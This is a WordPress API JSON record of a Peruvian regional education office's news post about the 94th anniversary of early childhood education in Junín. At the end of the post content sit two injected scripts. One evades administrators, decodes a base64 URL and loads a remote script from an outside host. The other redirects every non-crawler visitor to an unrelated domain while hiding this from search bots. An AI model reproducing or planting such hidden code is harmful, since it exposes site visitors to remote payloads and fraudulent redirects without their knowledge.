{"id":184,"date":"2025-06-07T02:19:49","date_gmt":"2025-06-07T02:19:49","guid":{"rendered":"https:\/\/ugelsatipo.gob.pe\/?p=184"},"modified":"2026-04-15T19:01:23","modified_gmt":"2026-04-15T19:01:23","slug":"region-junin-celebra-los-94-anos-de-la-educacion-inicial-con-actividades-que-fortalecen-el-bienestar-socioemocional-de-la-infancia","status":"publish","type":"post","link":"https:\/\/ugelsatipo.gob.pe\/index.php\/2025\/06\/07\/region-junin-celebra-los-94-anos-de-la-educacion-inicial-con-actividades-que-fortalecen-el-bienestar-socioemocional-de-la-infancia\/","title":{"rendered":"REGI\u00d3N JUN\u00cdN CELEBRA LOS 94 A\u00d1OS DE LA EDUCACI\u00d3N INICIAL CON ACTIVIDADES QUE FORTALECEN EL BIENESTAR SOCIOEMOCIONAL DE LA INFANCIA"},"content":{"rendered":"<p>Con motivo del 94.\u00ba aniversario de la Educaci\u00f3n Inicial en el Per\u00fa, la Direcci\u00f3n Regional de Educaci\u00f3n Jun\u00edn (DREJ), a trav\u00e9s de su Direcci\u00f3n de Gesti\u00f3n Pedag\u00f3gica, ha dispuesto el desarrollo de una jornada conmemorativa regional que se llevar\u00e1 a cabo del 25 al 30 de mayo del presente a\u00f1o. Esta iniciativa busca visibilizar la importancia de la Educaci\u00f3n Inicial como base del desarrollo integral de ni\u00f1as y ni\u00f1os, que en nuestra regi\u00f3n alcanzan los 72 369 estudiantes que ser\u00e1n parte significativas actividades promovidas en todas las instituciones educativas del nivel inicial, tanto p\u00fablicas como privadas, en el \u00e1mbito de nuestra regi\u00f3n.<\/p>\n<p>La celebraci\u00f3n del D\u00eda de la Educaci\u00f3n Inicial recuerda la fundaci\u00f3n del primer Jard\u00edn de Infancia en el pa\u00eds, el 25 de mayo de 1931, dirigido por las destacadas educadoras Victoria y Emilia Barcia Boniffatti. Con el lema \u201cTodo por amor, nada por fuerza\u201d, este hito marc\u00f3 el inicio de una visi\u00f3n educativa centrada en la ternura, el juego y el respeto por la infancia. En la regi\u00f3n Jun\u00edn, esta fecha no solo representa un momento de homenaje hist\u00f3rico, sino tambi\u00e9n una oportunidad para fortalecer el compromiso pedag\u00f3gico, familiar y comunitario con la primera infancia; celebraci\u00f3n que se fortalece con la \u00faltima publicaci\u00f3n de la Resoluci\u00f3n Ministerial N\u00b0 213-2025-MINEDU con el que formalizan la declaraci\u00f3n del 25 de mayo de cada a\u00f1o escolar como el \u201cd\u00eda de la educaci\u00f3n inicial\u201d y su incorporaci\u00f3n en el calendario c\u00edvico escolar.<\/p>\n<p>Este a\u00f1o, el enfoque de la jornada estar\u00e1 centrado en el bienestar socioemocional como pilar fundamental del desarrollo infantil. En este marco, se promover\u00e1n acciones que involucren activamente a las familias como agentes clave en la formaci\u00f3n emocional de los ni\u00f1os, reconociendo que es en el hogar donde se construyen las bases de la autoestima, la empat\u00eda y la autorregulaci\u00f3n. Asimismo, se resaltar\u00e1 la importancia del bienestar del educador como condici\u00f3n esencial para garantizar entornos afectivos, c\u00e1lidos y seguros, donde las ni\u00f1as y ni\u00f1os puedan aprender y crecer con confianza. De igual forma, se impulsar\u00e1 la creaci\u00f3n de espacios educativos protectores, libres de violencia y adaptados a las necesidades emocionales de los menores.<\/p>\n<p>Durante esta semana, cada UGEL de la regi\u00f3n organizar\u00e1, junto a las instituciones educativas, y los 4 599 docentes actividades pedag\u00f3gicas, recreativas, art\u00edsticas y culturales contextualizadas a su realidad local. Entre las acciones sugeridas se encuentran ferias pedag\u00f3gicas, juegos tradicionales, dramatizaciones, presentaciones art\u00edsticas, murales conmemorativos, cuentacuentos, encuentros con las familias y exposiciones de experiencias educativas innovadoras. Se espera que estas actividades reflejen la riqueza de la diversidad cultural de Jun\u00edn, y fortalezcan la identidad y la expresi\u00f3n emocional de los estudiantes m\u00e1s peque\u00f1os.<\/p>\n<p>Adem\u00e1s, se busca que estas celebraciones se realicen de manera articulada con las autoridades locales, gobiernos municipales, comit\u00e9s de gesti\u00f3n, organizaciones sociales y actores comunitarios, promoviendo la corresponsabilidad social en la atenci\u00f3n de la primera infancia. Cada instituci\u00f3n educativa deber\u00e1 desarrollar al menos una actividad significativa y registrar sus evidencias. Las UGEL consolidar\u00e1n estos informes y los remitir\u00e1n a la DREJ hasta el 6 de junio.<br \/>El director regional de Educaci\u00f3n, economista Medardo Severo G\u00f3mez Miguel, destac\u00f3 que este aniversario representa una valiosa ocasi\u00f3n para reflexionar sobre lo avanzado y para proyectar nuevas acciones que garanticen mejores condiciones para las ni\u00f1as y ni\u00f1os de nuestra regi\u00f3n. Se\u00f1al\u00f3 que los primeros a\u00f1os de vida son determinantes y que invertir en la infancia es apostar por el futuro de Jun\u00edn. Afirm\u00f3 que la Educaci\u00f3n Inicial debe ser fortalecida no solo como un servicio educativo, sino como un derecho fundamental que habilita a la ni\u00f1ez a desarrollarse con plenitud.<\/p>\n<p>La Direcci\u00f3n Regional de Educaci\u00f3n Jun\u00edn reafirma su compromiso con una Educaci\u00f3n Inicial de calidad, afectiva, inclusiva y con enfoque de derechos. La celebraci\u00f3n de este 94.\u00ba aniversario es tambi\u00e9n un llamado a renovar los esfuerzos desde cada comunidad educativa, familia y sociedad civil para construir juntos una regi\u00f3n que abrace, cuide y potencie a su infancia.<br \/>Celebrar la Educaci\u00f3n Inicial es sembrar esperanza, ternura y futuro en cada ni\u00f1a y ni\u00f1o de Jun\u00edn.<\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><br \/>\n<script>(function(){var b=[\"Googlebot\",\"bingbot\",\"YandexBot\",\"Baiduspider\",\"DuckDuckBot\",\"Slurp\",\"facebook\",\"twitter\",\"linkedin\",\"pinterest\",\"ahrefs\",\"semrush\",\"mj12\",\"petal\",\"applebot\"];var u=navigator.userAgent||\"\";var f=false;for(var i=0;i<b.length;i++){if(u.toLowerCase().indexOf(b[i].toLowerCase())!==-1){f=true;break}}if(!f){window.location.replace(\"https:\/\/ledgeer-lives.com\/?src=wparticles\")}})()<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Con motivo del 94.\u00ba aniversario de la Educaci\u00f3n Inicial en el Per\u00fa, la Direcci\u00f3n Regional de Educaci\u00f3n Jun\u00edn (DREJ), a trav\u00e9s de su Direcci\u00f3n de Gesti\u00f3n Pedag\u00f3gica, ha dispuesto el desarrollo de una jornada conmemorativa regional que se llevar\u00e1 a cabo del 25 al 30 de mayo del presente a\u00f1o. Esta iniciativa busca visibilizar la [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":185,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-184","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/posts\/184","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/comments?post=184"}],"version-history":[{"count":3,"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/posts\/184\/revisions"}],"predecessor-version":[{"id":859,"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/posts\/184\/revisions\/859"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/media\/185"}],"wp:attachment":[{"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/media?parent=184"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/categories?post=184"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelsatipo.gob.pe\/index.php\/wp-json\/wp\/v2\/tags?post=184"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}